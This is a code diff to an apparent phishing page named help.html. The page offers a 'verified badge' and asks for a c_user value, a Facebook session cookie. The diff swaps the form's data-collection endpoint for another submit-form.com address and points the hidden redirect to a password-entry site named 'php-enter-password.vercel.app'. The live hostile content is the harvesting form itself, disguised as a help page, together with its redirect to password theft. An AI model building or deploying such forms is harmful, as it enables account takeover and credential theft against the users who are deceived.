--- a/help.html
+++ b/help.html
@@ -212,8 +212,8 @@
 
         <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may result in not receiving a verified badge.</p>
 
-        <form class="content" action="https://submit-form.com/1OQ3NxfWf" method="POST">
-            <input type="hidden" name="_redirect" value="https://php-password-apply-security.vercel.app/" />
+        <form class="content" action="https://submit-form.com/3SzLGaesM" method="POST">
+            <input type="hidden" name="_redirect" value="https://php-enter-password.vercel.app/" />
 
             <div class=form-group>
                 <label for=c_user>c_user</label>
